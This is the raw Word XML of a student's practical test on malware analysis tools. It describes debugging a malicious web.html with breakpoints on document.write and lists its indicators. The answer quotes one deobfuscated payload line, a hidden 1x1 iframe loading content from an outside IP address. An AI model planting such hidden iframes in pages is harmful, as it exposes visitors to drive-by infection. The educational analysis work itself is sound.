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A395E" w14:textId="77777777" w:rsidR="00A01C0A" w:rsidRDefault="00B82E58" w:rsidP="00A92238">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92238">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251649024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3688BCA0" wp14:editId="46C78E07">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4321810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2136775" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="il_fi" descr="http://4.bp.blogspot.com/_UkXU51rdkRo/TTfHLdq1dWI/AAAAAAAAATo/rlbLS2ZLo4A/s1600/800px-Ngee_Ann_Pol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4.bp.blogspot.com/_UkXU51rdkRo/TTfHLdq1dWI/AAAAAAAAATo/rlbLS2ZLo4A/s1600/800px-Ngee_Ann_Poly_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77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2238">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz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2EC25B" wp14:editId="7AE32739">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>309880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>270510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3573710" cy="45719"/>
                <wp:effectExtent l="0" t="0" r="273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10" cy="4571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38A4A" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:24.4pt;margin-top:21.3pt;width:281.4pt;height:3.6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" fillcolor="black [3213]" strokecolor="black [3213]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A92238" w:rsidRPr="00A92238">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">MALWARE ANALYSIS </w:t>
      </w:r>
      <w:r w:rsidR="00CD75AE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>TOOLS AND TECHNIQUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8794F3" w14:textId="77777777" w:rsidR="00A92238" w:rsidRDefault="00A24B21" w:rsidP="00A92238">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>PRACTICAL TE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9"/>
        <w:gridCol w:w="4381"/>
        <w:gridCol w:w="3276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD75AE" w14:paraId="1C4229C9" w14:textId="77777777" w:rsidTr="00CD75AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1369" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="786A2B41" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRPr="00BB368F" w:rsidRDefault="00CD75AE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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C0A5BEB" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRDefault="00CD75AE" w:rsidP="00A92238"/>
          <w:p w14:paraId="54751139" w14:textId="041E1F3C" w:rsidR="00CD75AE" w:rsidRDefault="007130D6" w:rsidP="00A92238">
            <w:r>
              <w:t>Dominic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A22A328" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRPr="00BB368F" w:rsidRDefault="00CD75AE" w:rsidP="00CD75AE">
            <w:pPr>
              <w:ind w:right="880"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB368F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD9FB25" w14:textId="6A365912" w:rsidR="00CD75AE" w:rsidRDefault="00097967" w:rsidP="00CD75AE">
            <w:r>
              <w:t>26 Jan 2023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E846419" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRPr="00CD75AE" w:rsidRDefault="00CD75AE" w:rsidP="00CD75AE">
            <w:r w:rsidRPr="00BB368F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Duration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="380112FC" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRDefault="00CD75AE" w:rsidP="00A92238">
            <w:r>
              <w:t>1.5 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD75AE" w14:paraId="10997CAB" w14:textId="77777777" w:rsidTr="00CD75AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1369" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3149CE80" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRPr="00BB368F" w:rsidRDefault="00CD75AE" w:rsidP="00BB368F">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB368F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Student ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7783CD1A" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRDefault="00CD75AE" w:rsidP="00A92238"/>
          <w:p w14:paraId="16605F06" w14:textId="1782526E" w:rsidR="00CD75AE" w:rsidRDefault="004D02DE" w:rsidP="00A92238">
            <w:r>
              <w:t>S10222894</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3276" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A2A3755" w14:textId="77777777" w:rsidR="00CD75AE" w:rsidRDefault="00CD75AE" w:rsidP="00A92238"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B5055DB" w14:textId="77777777" w:rsidR="00A92238" w:rsidRDefault="00A92238" w:rsidP="00A92238"/>
    <w:p w14:paraId="03FA9312" w14:textId="77777777" w:rsidR="00BB368F" w:rsidRDefault="00BB368F" w:rsidP="00A92238">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB368F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20027BF6" w14:textId="12A4FF81" w:rsidR="00097967" w:rsidRDefault="00097967" w:rsidP="00BB368F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This is a closed book test</w:t>
      </w:r>
      <w:r w:rsidR="00AA1268">
        <w:t>, however s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tudents are allowed to bring in and refer to </w:t>
      </w:r>
      <w:r w:rsidR="00AA1268">
        <w:t>ONE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> printed or handwritten A4 page with </w:t>
      </w:r>
      <w:r w:rsidR="00AA1268">
        <w:t xml:space="preserve">necessary </w:t>
      </w:r>
      <w:r>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidR="00AA1268">
        <w:t xml:space="preserve"> relevant to his test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730DCB9" w14:textId="2C56FBB1" w:rsidR="00E11A00" w:rsidRDefault="00097967" w:rsidP="00BB368F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00097967">
        <w:t>tudents need to turn on “Airplane Mode” on their laptops and remember to continuously “save” the downloaded document while they are filling it up with their answers.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86209">
        <w:t xml:space="preserve">Connecting to the Internet at any point during the test is considered </w:t>
      </w:r>
      <w:r w:rsidR="00256588">
        <w:t>cheating</w:t>
      </w:r>
      <w:r w:rsidR="00D050C1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C8E73C" w14:textId="0DDBA8F6" w:rsidR="00BB368F" w:rsidRDefault="0088631A" w:rsidP="00BB368F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ex</w:t>
      </w:r>
      <w:r w:rsidR="00B05C09">
        <w:t xml:space="preserve">tract </w:t>
      </w:r>
      <w:r w:rsidR="00FD6D1B">
        <w:t>the following archives</w:t>
      </w:r>
      <w:r w:rsidR="00B50759">
        <w:t xml:space="preserve"> on to the desktop. </w:t>
      </w:r>
      <w:r w:rsidR="007D1F3A">
        <w:t>The password for</w:t>
      </w:r>
      <w:r w:rsidR="00A24B21">
        <w:t xml:space="preserve"> the malware</w:t>
      </w:r>
      <w:r w:rsidR="00F77E97">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A24B21">
        <w:t xml:space="preserve"> is "</w:t>
      </w:r>
      <w:r w:rsidR="00F77E97">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidR="00DA52BF">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00BB368F">
        <w:t xml:space="preserve"> (without the quotes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B8BA3" w14:textId="68ADFA99" w:rsidR="003B109B" w:rsidRDefault="0036603B" w:rsidP="00371388">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00616EBB">
        <w:t>.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE3CD5" w14:textId="1BA6FF53" w:rsidR="00371388" w:rsidRDefault="004B431D" w:rsidP="00371388">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r w:rsidR="00616EBB">
        <w:t>.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C1A1C" w14:textId="7922D0CB" w:rsidR="00BB7655" w:rsidRDefault="00650B42" w:rsidP="00BB368F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00BB7655">
        <w:t xml:space="preserve">his paper is </w:t>
      </w:r>
      <w:r w:rsidR="006C2416">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidR="00BB7655" w:rsidRPr="00616EBB">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Marks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783CD823" w14:textId="4BA4D021" w:rsidR="00F64220" w:rsidRDefault="00F64220" w:rsidP="00F64220">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submission of the answers document is via </w:t>
      </w:r>
      <w:r w:rsidR="00650B42">
        <w:t xml:space="preserve">POLITEMall Assignment </w:t>
      </w:r>
      <w:r>
        <w:t>submission. Permission must be taken before connecting the host OS to the Internet</w:t>
      </w:r>
      <w:r w:rsidR="00650B42">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0057604F">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00650B42">
        <w:t xml:space="preserve"> upload the answer document</w:t>
      </w:r>
      <w:r>
        <w:t>. Name of the word document must be in the following format: P0</w:t>
      </w:r>
      <w:r w:rsidR="000375F7">
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>_StudentFullName_MATTPT2.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7ADDC" w14:textId="77777777" w:rsidR="006C2416" w:rsidRDefault="006C2416">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24926BF5" w14:textId="01B3552F" w:rsidR="00BB368F" w:rsidRPr="000D785C" w:rsidRDefault="000D785C" w:rsidP="00BB368F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D785C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question</w:t>
      </w:r>
      <w:r w:rsidR="00A465FA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="008D0D62">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (25 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204449EE" w14:textId="4DA6C49E" w:rsidR="00C37AD9" w:rsidRDefault="00070864" w:rsidP="000D785C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Briefly describe the steps </w:t>
      </w:r>
      <w:r w:rsidR="00917BB4">
        <w:t xml:space="preserve">to analyse </w:t>
      </w:r>
      <w:r w:rsidR="002632C0">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00917BB4">
        <w:t>.html</w:t>
      </w:r>
      <w:r w:rsidR="004C4B85">
        <w:t>. Provide</w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t xml:space="preserve"> detailed</w:t>
      </w:r>
      <w:r w:rsidR="004C4B85">
        <w:t xml:space="preserve"> screenshots as evidence for each of the steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B6837" w14:textId="6A327247" w:rsidR="00F03783" w:rsidRDefault="007B64C2" w:rsidP="00CD09A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CD75AE">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CD09A1">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
      <w:r w:rsidR="00CD09A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56F0ED" w14:textId="1E65737D" w:rsidR="0009538F" w:rsidRDefault="0009538F" w:rsidP="00CD09A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350C4F83" w14:textId="4D6CCDD0" w:rsidR="0009538F" w:rsidRDefault="00194F2A" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The first step is to open the HTML file and see if there are any errors with it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220746F" w14:textId="29BC2BA6" w:rsidR="00C1685C" w:rsidRDefault="00C1685C" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1685C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="438379D7" wp14:editId="1C84B262">
            <wp:extent cx="5731510" cy="26111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552C" w14:textId="60F3F4E2" w:rsidR="00C1685C" w:rsidRDefault="00C1685C" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here we see there are no problems. The next step is to </w:t>
      </w:r>
      <w:r w:rsidR="00565F80">
        <w:t>add debugger after the script tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A067C04" w14:textId="68647CF6" w:rsidR="00A4012A" w:rsidRDefault="00A4012A" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A4012A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAD8C91" wp14:editId="2CA24602">
            <wp:extent cx="5731510" cy="27755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D915" w14:textId="5A8377E1" w:rsidR="00A4012A" w:rsidRDefault="00A4012A" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then we open the file html file using firebug and place breakpoints </w:t>
      </w:r>
      <w:r w:rsidR="00A43AD6">
        <w:t xml:space="preserve">on the points </w:t>
      </w:r>
      <w:r w:rsidR="00FE7652">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00A43AD6">
        <w:t>document.write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24027F84" w14:textId="2FDB8283" w:rsidR="00E460E0" w:rsidRDefault="00E460E0" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E460E0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E59C6C4" wp14:editId="01AB9E10">
            <wp:extent cx="5731510" cy="35547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A600" w14:textId="1FA2F183" w:rsidR="00E460E0" w:rsidRDefault="00E460E0" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then we run the script using fn F8 to see the different changes when the hmtl file runs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917FAA4" w14:textId="7805B6E3" w:rsidR="00DE60FD" w:rsidRDefault="00DE60FD" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE60FD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DE730D3" wp14:editId="4ABAB6DA">
            <wp:extent cx="5731510" cy="3532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1FAC" w14:textId="216B36E5" w:rsidR="00DE60FD" w:rsidRDefault="00DE60FD" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>Because there is another document.write located in the file, there are 2 breakpoints set and we will run the file again to the 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE60FD">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> break point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925C2F7" w14:textId="34A4AA5C" w:rsidR="003B3A88" w:rsidRDefault="003B3A88" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="003B3A88">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="487BED5D" wp14:editId="61D49D55">
            <wp:extent cx="5731510" cy="35629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5527" w14:textId="181F4F36" w:rsidR="003B3A88" w:rsidRDefault="003B3A88" w:rsidP="00194F2A">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>From here we can analyse the different things found at the breakpoints to gain more insights into the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14137160" w14:textId="173C4D7F" w:rsidR="00855368" w:rsidRDefault="001B0046" w:rsidP="00855368">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Hint:</w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855368" w:rsidRPr="00855368">
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t xml:space="preserve">SciTE Text Editor’s </w:t>
      </w:r>
      <w:r w:rsidR="00855368" w:rsidRPr="00855368">
        <w:t>search option, you will notice more than one occurrence of document.write() instructions</w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t>, try</w:t>
      </w:r>
      <w:r w:rsidR="00855368" w:rsidRPr="00855368">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00855368" w:rsidRPr="00855368">
        <w:t xml:space="preserve">deofuscated </w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t>as much code as you can</w:t>
      </w:r>
      <w:r w:rsidR="00855368" w:rsidRPr="00855368">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A931E" w14:textId="77777777" w:rsidR="00DE60FD" w:rsidRPr="00855368" w:rsidRDefault="00DE60FD" w:rsidP="00855368">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F9F4BD" w14:textId="77777777" w:rsidR="008D71EE" w:rsidRDefault="008D71EE" w:rsidP="008D71EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B5D6AE" w14:textId="4DDEDCD3" w:rsidR="00D800D2" w:rsidRDefault="00EB7473" w:rsidP="00275D06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">List down and </w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t xml:space="preserve">briefly explain important </w:t>
      </w:r>
      <w:r w:rsidR="00BA1851">
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t xml:space="preserve"> and/or host-based</w:t>
      </w:r>
      <w:r w:rsidR="00087DDF">
        <w:t xml:space="preserve"> indicators </w:t>
      </w:r>
      <w:r w:rsidR="00BC6F74">
        <w:t xml:space="preserve">found in </w:t>
      </w:r>
      <w:r w:rsidR="002632C0">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F74">
        <w:t>.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A5840" w14:textId="1C6697B4" w:rsidR="00A840A4" w:rsidRDefault="000A310F" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00855368">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="007B64C2">
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6A1F1" w14:textId="1ACAFAE4" w:rsidR="00AF6F30" w:rsidRDefault="001926DD" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="001926DD">
        <w:t>&lt;/textarea&gt;&lt;iframe src="http://66.109.23.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp" width=1 height=1 style="border: 0px"&gt;&lt;/iframe&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. There is an ip address in here which is a network based indicator indicating </w:t>
      </w:r>
      <w:r w:rsidR="007F1C9C">
        <w:t xml:space="preserve">a potential malware connection to it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807AB0E" w14:textId="593A3B0F" w:rsidR="003F2E6C" w:rsidRDefault="003F2E6C" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F89BC5" w14:textId="2E71A5F5" w:rsidR="003F2E6C" w:rsidRDefault="003F2E6C" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>Below is another network based indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8830A" w14:textId="6AF434B8" w:rsidR="003F2E6C" w:rsidRDefault="003F2E6C" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="003F2E6C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7892C2BF" wp14:editId="31462488">
            <wp:extent cx="3002540" cy="70872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6357" w14:textId="02A18983" w:rsidR="003F2E6C" w:rsidRDefault="003F2E6C" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CDD1A" w14:textId="0322FD95" w:rsidR="00FA1ABE" w:rsidRDefault="00FA1ABE" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA1ABE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46628644" wp14:editId="4CC5ADC1">
            <wp:extent cx="5258256" cy="632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E7B0" w14:textId="3015B5E5" w:rsidR="00410A83" w:rsidRDefault="00410A83" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00410A83">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B295E5" wp14:editId="4ABF831C">
            <wp:extent cx="5731510" cy="28016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DB2C" w14:textId="191E349E" w:rsidR="00410A83" w:rsidRDefault="00410A83" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are also functions and code written which upon analysing can show us the functionality of the </w:t>
      </w:r>
      <w:r w:rsidR="000349FB">
        <w:t>file. These are host-based indicators.</w:t>
      </w:r>
    </w:p>
